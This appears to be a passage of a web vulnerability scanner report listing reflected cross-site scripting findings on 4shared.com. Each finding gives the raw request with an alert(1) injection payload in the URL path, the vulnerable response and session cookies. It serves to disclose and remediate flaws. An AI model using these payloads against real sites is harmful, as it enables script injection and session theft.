The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b9ea5'-alert(1)-'bc481ad250d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mb9ea5'-alert(1)-'bc481ad250d/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/desktop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; ppage=P2; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311948073594; fp=4sess_p72033306_t20110729-150115_

Response

HTTP/1.1 404 /mb9ea5'-alert(1)-'bc481ad250d/
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:06:50 GMT
Content-Length: 38582


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/mb9ea5'-alert(1)-'bc481ad250d/',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ens
...[SNIP]...

2.97. http://www.4shared.com/m/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /m/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f5046"-alert(1)-"c5cf01eb698 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mf5046"-alert(1)-"c5cf01eb698/ HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/desktop/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; ppage=P2; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311948073594; fp=4sess_p72033306_t20110729-150115_

Response

HTTP/1.1 404 /mf5046&quot;-alert(1)-&quot;c5cf01eb698/
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:06:48 GMT
Content-Length: 38755


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/mf5046"-alert(1)-"c5cf01eb698/";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var win
...[SNIP]...

2.98. http://www.4shared.com/premium.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3eb5'-alert(1)-'57b031188b4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /premium.jspd3eb5'-alert(1)-'57b031188b4?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /premium.jspd3eb5'-alert(1)-'57b031188b4
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:46 GMT
Content-Length: 38800


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
eof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/premium.jspd3eb5'-alert(1)-'57b031188b4',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.99. http://www.4shared.com/premium.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /premium.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d74b"-alert(1)-"9250d38803 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /premium.jsp9d74b"-alert(1)-"9250d38803?ref=header HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /premium.jsp9d74b&quot;-alert(1)-&quot;9250d38803
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:04:42 GMT
Content-Length: 38798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/premium.jsp9d74b"-alert(1)-"9250d38803";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.100. http://www.4shared.com/remindPassword.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /remindPassword.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4473"-alert(1)-"a9e58964337 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /remindPassword.jspa4473"-alert(1)-"a9e58964337 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /remindPassword.jspa4473&quot;-alert(1)-&quot;a9e58964337
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:03:01 GMT
Content-Length: 38836


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/remindPassword.jspa4473"-alert(1)-"a9e58964337";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.101. http://www.4shared.com/remindPassword.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /remindPassword.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ad7a'-alert(1)-'9ef5754e82c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /remindPassword.jsp9ad7a'-alert(1)-'9ef5754e82c HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/login.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; ppVisited=%2Fsignup.jsp; ppVisitDate=1311947871563; fp=4sess_p8b7fcdae_t20110729-145753_; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /remindPassword.jsp9ad7a'-alert(1)-'9ef5754e82c
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:03:05 GMT
Content-Length: 38834


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
inBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/remindPassword.jsp9ad7a'-alert(1)-'9ef5754e82c',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.102. http://www.4shared.com/requestCall.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /requestCall.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1c5c1"-alert(1)-"2670472e93d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /requestCall.jsp1c5c1"-alert(1)-"2670472e93d HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /requestCall.jsp1c5c1&quot;-alert(1)-&quot;2670472e93d
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:35 GMT
Content-Length: 38822


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/requestCall.jsp1c5c1"-alert(1)-"2670472e93d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.103. http://www.4shared.com/requestCall.jsp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /requestCall.jsp

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23010'-alert(1)-'bf6bc28c3f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /requestCall.jsp23010'-alert(1)-'bf6bc28c3f HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/enterprise/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; fp=4sess_p8b7fcdae_t20110729-145753_; ppage=P2; ppVisited=%2FpremiumN2.jsp%3Fref%3Dheader; ppVisitDate=1311947944960; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 /requestCall.jsp23010'-alert(1)-'bf6bc28c3f
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:01:39 GMT
Content-Length: 38817


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/requestCall.jsp23010'-alert(1)-'bf6bc28c3f',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.104. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /rest/account/freeSpace

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload caf66'-alert(1)-'84c2e73cb5f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /restcaf66'-alert(1)-'84c2e73cb5f/account/freeSpace?dirId=-1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /restcaf66'-alert(1)-'84c2e73cb5f/account/freeSpace
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:57:28 GMT
Content-Length: 38667


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/restcaf66'-alert(1)-'84c2e73cb5f/account/freeSpace',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}

...[SNIP]...

2.105. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /rest/account/freeSpace

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9e01"-alert(1)-"1f9f4994b83 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resta9e01"-alert(1)-"1f9f4994b83/account/freeSpace?dirId=-1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /resta9e01&quot;-alert(1)-&quot;1f9f4994b83/account/freeSpace
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:57:26 GMT
Content-Length: 38672


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/resta9e01"-alert(1)-"1f9f4994b83/account/freeSpace";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback(
...[SNIP]...

2.106. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /rest/account/freeSpace

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 357e7'-alert(1)-'2c4f98a63ac was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rest/account357e7'-alert(1)-'2c4f98a63ac/freeSpace?dirId=-1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /rest/account357e7'-alert(1)-'2c4f98a63ac/freeSpace
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:57:39 GMT
Content-Length: 38849


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
of loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/rest/account357e7'-alert(1)-'2c4f98a63ac/freeSpace',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

fun
...[SNIP]...

2.107. http://www.4shared.com/rest/account/freeSpace [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /rest/account/freeSpace

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22f91"-alert(1)-"6aa4867a991 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rest/account22f91"-alert(1)-"6aa4867a991/freeSpace?dirId=-1 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""; __utma=210074320.861131724.1311947805.1311947805.1311947805.1; __utmb=210074320.0.10.1311947805; __utmc=210074320; __utmz=210074320.1311947805.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-487009560-1311947805463; JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329; WWW_JSESSIONID=9EC917635D39C7048D313C4C564DD6DA.dc329

Response

HTTP/1.1 404 /rest/account22f91&quot;-alert(1)-&quot;6aa4867a991/freeSpace
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:57:37 GMT
Content-Length: 38845


